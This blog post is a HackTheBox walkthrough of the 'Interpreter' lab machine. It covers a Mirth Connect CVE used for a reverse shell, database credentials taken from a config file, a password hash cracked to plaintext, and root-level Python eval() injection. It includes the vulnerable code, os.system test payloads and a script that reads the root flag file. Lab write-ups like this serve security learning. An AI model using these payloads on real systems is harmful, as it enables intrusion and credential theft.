<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="Beylessen Jendoubi"/><meta name="copyright" content="Beylessen Jendoubi"/><meta name="theme-color" content="#FFB0DD"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="HackTheBox,Writeup,Season 10"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="Interpreter Writeup | Beylessen's Blog"/><meta name="apple-mobile-web-app-title" content="Interpreter Writeup | Beylessen's Blog"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB0DD"/><link rel="canonical" href="https://beylessen1.github.io/Blog/2026/03/19/Interpreter-Writeup/"/><meta name="description" content="This is my first medium machine ever pwned. Overview :Interpreter is a medium-rated HackTheBox machine that exploits a CVE in Mirth Connect  healthcare integration platform as well as  a Python eva...">
<meta property="og:type" content="article">
<meta property="og:title" content="Interpreter Writeup | Beylessen&#39;s Blog">
<meta property="og:url" content="https://beylessen1.github.io/Blog/2026/03/19/Interpreter-Writeup/index.html">
<meta property="og:site_name" content="Beylessen&#39;s Blog">
<meta property="og:description" content="This is my first medium machine ever pwned. Overview :Interpreter is a medium-rated HackTheBox machine that exploits a CVE in Mirth Connect  healthcare integration platform as well as  a Python eva...">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://beylessen1.github.io/Blog/assets/images/Writeups/Interpreter/cover.png">
<meta property="article:published_time" content="2026-03-19T21:39:23.000Z">
<meta property="article:modified_time" content="2026-03-19T22:12:18.525Z">
<meta property="article:author" content="Beylessen Jendoubi">
<meta property="article:tag" content="HackTheBox">
<meta property="article:tag" content="Season 10">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://beylessen1.github.io/Blog/assets/images/Writeups/Interpreter/cover.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>Interpreter Writeup | Beylessen's Blog</title><link rel="shortcut icon" href="/Blog/assets/images/curlers.png"><link rel="preconnect" href="/Blog/assets"/><link rel="preconnect" href="assets"/><link rel="preconnect" href="assets"/><script>document.documentElement.classList.remove('light');
document.documentElement.classList.add('dark');
</script>
<link rel="stylesheet" href="/Blog/css/style.css">
<link rel="prefetch" href="/Blog/"/><link rel="prefetch" href="/Blog/archives"/><link rel="prefetch" href="/Blog/tags"/><meta name="generator" content="Hexo 8.1.1"></head><body bg-style="none"><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/Blog/" title="Home"><img src="/Blog/assets/images/curlers.png" alt="Logo"/></a><a id="site-name" href="/Blog/" title="Home"><div>Beylessen's Blog</div><img src="/Blog/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"><div class="menu-item"><a href="javascript:void(0);"><img src="/Blog/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>Articles</span></a><ul class="sub-menu-item"><li><a href="/Blog/archives"><img src="/Blog/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>Archives</span></a></li><li><a href="/Blog/categories"><img src="/Blog/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>Categories</span></a></li><li><a href="/Blog/tags"><img src="/Blog/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>Tags</span></a></li></ul></div><div class="menu-item"><a href="/Blog/about"><img src="/Blog/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>About</span></a></div></div><div id="nav-function"><div id="menu-btn"><a href="javascript:void(0);" title="Toggle Menu"><img src="/Blog/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/Blog/" title="Home"><img src="/Blog/assets/images/curlers.png" alt="Logo"/></a><a href="/Blog/" title="Home">Beylessen's Blog</a></div><div class="menu-aside-item"><a href="javascript:void(0);"><img src="/Blog/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>Articles</span></a><ul class="menu-aside-sub-item"><li><a href="/Blog/archives"><img src="/Blog/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>Archives</span></a></li><li><a href="/Blog/categories"><img src="/Blog/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>Categories</span></a></li><li><a href="/Blog/tags"><img src="/Blog/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>Tags</span></a></li></ul></div><div class="menu-aside-item"><a href="/Blog/about"><img src="/Blog/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>About</span></a></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/Blog/assets/images/curlers.png" alt="Avatar"/></div><div class="banner-title">Beylessen's Blog</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">Interpreter Writeup</h1><div class="post-author"><span>Author: Beylessen Jendoubi</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/Blog/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>Created: 2026-03-19</span></div><div class="post-update"><img src="/Blog/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>Updated: 2026-03-19</span></div></div><div class="post-read"></div></div><div class="post-attribute"><div class="post-categories"><img src="/Blog/assets/images/svg/ta/ta-category.svg" class="icon noview" alt="Icon"><span><a class="post-categories-link" href="/Blog/categories/Writeups/">Writeups</a></span></div><div class="post-tags"><img src="/Blog/assets/images/svg/ta/ta-tag.svg" class="icon noview" alt="Icon"><span><a class="post-tags-link" href="/Blog/tags/HackTheBox/" rel="tag">HackTheBox</a><a class="post-tags-link" href="/Blog/tags/Season-10/" rel="tag">Season 10</a><a class="post-tags-link" href="/Blog/tags/Writeup/" rel="tag">Writeup</a></span></div></div></div><div class="post markdown" indent="false"><img  class="postcover" alt="Post Cover"  lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="https://beylessen1.github.io/Blog/assets/images/Writeups/Interpreter/cover.png" ><p>This is my first medium machine ever pwned.</p>
<h1 id="Overview"><a href="#Overview" class="headerlink" title="Overview :"></a>Overview :</h1><p>Interpreter is a medium-rated HackTheBox machine that exploits a CVE in <strong>Mirth Connect</strong>  healthcare integration platform as well as  a <strong>Python eval()</strong>  injection vulnerability in a Flask notification service running as root.</p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/1.png"  alt="overview"></p>
<h1 id="Reconnaissance"><a href="#Reconnaissance" class="headerlink" title="Reconnaissance"></a>Reconnaissance</h1><p>Quick <strong>naabu</strong> scan to enumerate ports :</p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/2.png"  alt="overview"></p>
<p>then <strong>nmap</strong> : </p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/3.png"  alt="overview"></p>
<p>The IP address redirects to &#x2F;webadmin&#x2F;Index.action and this is the first dashboard.</p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/4.png"  alt="overview"></p>
<p>The “Download Administrator Launcher” redirects to a Bash Script saved on an AWS S3 bucket (<a target="_blank" rel="noopener" href="https://s3.amazonaws.com/downloads.mirthcorp.com/connect-client-launcher/mirth-administrator-launcher-latest-unix.sh">https://s3.amazonaws.com/downloads.mirthcorp.com/connect-client-launcher/mirth-administrator-launcher-latest-unix.sh</a>) , wheras the “Access Secure Site” simply takes us to a login dashboard.</p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/5.png"  alt="overview"></p>
<h3 id="Mirth-Connect"><a href="#Mirth-Connect" class="headerlink" title="Mirth Connect ?"></a>Mirth Connect ?</h3><p><strong>Mirth Connect</strong> is an open-source <strong>healthcare integration engine</strong> that enables different medical systems to communicate with each other, even if they use different file formats.</p>
<p>The only thing that caught my attention so far is the <strong>release year : 2021</strong> .<br>I went and checked the versions for potential CVEs, and hit the jackpot : </p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/6.png"  alt="overview"><br>The latest 2021 version of Mirth is prone to CVE-2023-43208:  a critical (9.8&#x2F;10) unauthenticated remote code execution (RCE) on systems running the vulnerable software versions. </p>
<h1 id="CVE-2023-43208"><a href="#CVE-2023-43208" class="headerlink" title="CVE-2023-43208"></a>CVE-2023-43208</h1><p>I checked a couple of PoCs online, ended up using a slightly modified version of the latter (nc instead of pwncat-cs for the listener) you can check it here :<br><a target="_blank" rel="noopener" href="https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT/tree/main">https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT/tree/main</a></p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/7.png"  alt="overview"></p>
<p>And we have a revshell as user <strong>mirth</strong> : </p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/8.png"  alt="overview"></p>
<p>I could locate the <strong>&#x2F;usr&#x2F;local&#x2F;mirthconnect&#x2F;conf&#x2F;mirth.properties</strong> file and it contained credentials to the <strong>mc_bdd_prod</strong> local database :</p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/9.png"  alt="overview"></p>
<p>DB credentials :<br><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/10.png"  alt="overview"></p>
<p>View of the tables :</p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/11.png"  alt="overview"></p>
<div class="code-container" code-lang="Sql"><div class="codebox"><figure class="highlight sql"><figcaption><span>title:mc_bdd_prod</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> PERSON;</span><br><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> PERSON_PASSWORD;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>Checking the <strong>PERSON</strong> and <strong>PERSON_PASSWORD</strong> tables reveal the user <strong>sedric</strong> and his hashed password :  <code>u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==</code></p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/12.png"  alt="overview"></p>
<h1 id="USER-ACCESS"><a href="#USER-ACCESS" class="headerlink" title="USER ACCESS"></a>USER ACCESS</h1><p>Did some research and here are the findings about the hash : </p>
<ul>
<li><strong>Algorithm</strong>: PBKDF2-HMAC-SHA256</li>
<li><strong>Salt</strong>: 8 bytes (embedded in hash)</li>
</ul>
<p>Cracking  with Hashcat :  <strong>sedric:snowflake1</strong><br>And finally SSH :</p>
<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/13.png"  alt="overview"></p>
<h1 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h1><p>Tried some manual checks (sudo -l , capabilities ..), but the interesting one was enumerating internal services :<br><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/14.png"  alt="overview"><br> A service running on port 54321 caught my eye, port forwarded it to my machine, nothing.<br> More digging.<br> Enumerated processes running as root and immediately a Python script stood out : </p>
<p> root        3488  0.0  0.7  39872 31160 ?        Ss   06:11   0:01 &#x2F;usr&#x2F;bin&#x2F;python3 &#x2F;usr&#x2F;local&#x2F;bin&#x2F;notif.py</p>
<p>This Python Flask application is a notification service that accepts XML patient data via POST requests and formats it using a custom template function. </p>
<p>The critical flaw was in how it handled template rendering—the code used <code>eval(f&quot;f&#39;&#39;&#39;&#123;template&#125;&#39;&#39;&#39;&quot;)</code> to process an f-string containing user-controlled variables.</p>
<div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><figcaption><span>title:Vulnerable Code</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">template</span>(<span class="params">first, last, sender, ts, dob, gender</span>):</span><br><span class="line">    pattern = re.<span class="built_in">compile</span>(<span class="string">r&quot;^[a-zA-Z0-9._&#x27;\&quot;()&#123;&#125;=+/]+$&quot;</span>)</span><br><span class="line">    <span class="comment"># ... validation ...</span></span><br><span class="line">    template = <span class="string">f&quot;Patient <span class="subst">&#123;first&#125;</span> <span class="subst">&#123;last&#125;</span> (<span class="subst">&#123;gender&#125;</span>), <span class="subst">&#123;​&#123;datetime.now().year - year_of_birth&#125;</span>​&#125; years old, received from <span class="subst">&#123;sender&#125;</span> at <span class="subst">&#123;ts&#125;</span>&quot;</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">eval</span>(<span class="string">f&quot;f&#x27;&#x27;&#x27;<span class="subst">&#123;template&#125;</span>&#x27;&#x27;&#x27;&quot;</span>)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>I encountered many sanitizations to spaces, commas, dollar signs and a bunch of other characters, and ran many tests before actually getting my hands on the flag.  </p>
<h3 id="Some-Successful-Tests"><a href="#Some-Successful-Tests" class="headerlink" title="Some Successful Tests"></a>Some Successful Tests</h3><p>{1+1}  # Returns: 2 ✓<br>{str(123)}  # Returns: 123 ✓</p>
<p>{<strong>import</strong>(‘os’)}  # Returns: &lt;module ‘os’&gt; ✓</p>
<p>{<strong>import</strong>(‘os’).system(‘id’)}  # Returns: 0 (success) ✓</p>
<p>{<strong>import</strong>(‘pathlib’).Path(‘&#x2F;tmp&#x2F;test’).write_text(‘hello’)}  # Returns: 5 ✓</p>
<h3 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h3><p>Use <code>pathlib.Path().read_text()</code> and <code>write_text()</code> to copy the root flag without needing commas or spaces in the Python expression itself.</p>
<div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><figcaption><span>title:Root Exploit</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3 </span></span><br><span class="line"><span class="keyword">import</span> requests </span><br><span class="line">payload = <span class="string">&quot;&lt;patient&gt;&lt;firstname&gt;A&lt;/firstname&gt;&lt;lastname&gt;B&lt;/lastname&gt;&lt;sender_app&gt;&#123;__import__(&#x27;pathlib&#x27;).Path(&#x27;/tmp/flag.txt&#x27;).write_text(__import__(&#x27;pathlib&#x27;).Path(&#x27;/root/root.txt&#x27;).read_text())&#125;&lt;/sender_app&gt;&lt;timestamp&gt;2025&lt;/timestamp&gt;&lt;birth_date&gt;01/01/1990&lt;/birth_date&gt;&lt;gender&gt;M&lt;/gender&gt;&lt;/patient&gt;&quot;</span> r = requests.post(<span class="string">&#x27;http://127.0.0.1:54321/addPatient&#x27;</span>, data=payload) </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Copy flag:&quot;</span>, r.text)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/Blog/assets/images/Meow-Loading.webp" data-lazy-src="/Blog/assets/images/Writeups/Interpreter/15.png"  alt="overview"></p>
<p>Now I technically didn’t get a root shell (I tried I promise) but this method got the job done. </p>
<h1 id="Rating"><a href="#Rating" class="headerlink" title="Rating"></a>Rating</h1><p>Exciting because my first ever medium machine, the root looked straight forward but turned out to be a bit tricky.<br> 4 stars.<br>⭐⭐⭐⭐</p>
</div><div class="post-reward"><div class="post-reward-btn" title="Reward The Author"><img src="/Blog/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span>Please share with your friends !</span></div><div class="post-reward-content"><div class="post-reward-text">Thanks for reading !</div></div></div><div class="post-copyright"><div class="post-copyright-info">This work is published by Beylessen Jendoubi at 2026-03-19 22:39:23</div><div class="post-copyright-link"><span>Link: <a href="https://beylessen1.github.io/Blog/2026/03/19/Interpreter-Writeup/">Interpreter Writeup</a></span><button class="copy-text" type="button" data-text="https://beylessen1.github.io/Blog/2026/03/19/Interpreter-Writeup/">Copy</button></div><div class="post-copyright-detail">This work is licensed under <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a>. Please indicate <a href='/Blog/'>Beylessen's Blog</a> when reprinting.</div><img class="post-copyright-icon noview" src="/Blog/assets/images/curlers.png" alt="Logo"/></div><div class="post-tail-tags"><a class="post-tail-tags-link" href="/Blog/tags/HackTheBox/" rel="tag">HackTheBox</a><a class="post-tail-tags-link" href="/Blog/tags/Season-10/" rel="tag">Season 10</a><a class="post-tail-tags-link" href="/Blog/tags/Writeup/" rel="tag">Writeup</a></div></div><aside id="post-sidebar" status="show"><div id="toc-container"><div class="toc-title"><img src="/Blog/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>Table Of Content</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#Overview"><span class="toc-list-text">Overview :</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#Reconnaissance"><span class="toc-list-text">Reconnaissance</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#Mirth-Connect"><span class="toc-list-text">Mirth Connect ?</span></a></li></ol></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#CVE-2023-43208"><span class="toc-list-text">CVE-2023-43208</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#USER-ACCESS"><span class="toc-list-text">USER ACCESS</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#Privilege-Escalation"><span class="toc-list-text">Privilege Escalation</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#Some-Successful-Tests"><span class="toc-list-text">Some Successful Tests</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#Exploit"><span class="toc-list-text">Exploit</span></a></li></ol></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#Rating"><span class="toc-list-text">Rating</span></a></li></ol></div></div></aside></div></div><div id="toolbar" hide=""><div class="toolbar-container"><div class="toolbar-item"><button id="tool-toc" title="Table Of Content" type="button"><img src="/Blog/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="Go To Top" type="button"><img src="/Blog/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div></main><footer><div class="footer"><div id="footer-copyright">© 2025 - 2026 <span>💗</span> <a href="/Blog/">Beylessen Jendoubi</a></div><div id="footer-info"><div id="footer-framework">🚀Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.2.0" target="_blank">Meow</a></div><div id="footer-runtime"><span id="runtime" data-startdate="2025-12-21T15:16:20.000Z">🌻Blog Runtime: . Years . Months . Days</span></div></div><div id="footer-pageview"><div id="container_site_pv"><span>🔥TOTAL PAGE VIEWS</span><span id="vercount_value_site_pv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div><div id="container_site_uv"><span>🐈TOTAL VISITORS</span><span id="vercount_value_site_uv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/Blog/',
  toolbar: true,
  lazyload_src: '/Blog/assets/images/Meow-Loading.webp',
  friends: false,
  codeblock: true,
  share_text: '🦁 Share From Bay',
  onblur_title: '～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: false,
    info: 'Copied successfully! Please mark the address of this post if redistribute.',
    f12_info: 'Turned on developer mode, please follow the copyright license of this website'
  },
  search: {
    enable: false,
    path: '',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'dark' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/Blog/js/theme/tools/utils.js"></script>

<script src="/Blog/js/plugins/dist/lazyload.min.js"></script>

<script src="/Blog/js/plugins/view-image.min.js"></script>
<script src="https://events.vercount.one/js" defer="defer"></script>
<script src="/Blog/js/main.js" type="module"></script>
</div></body></html>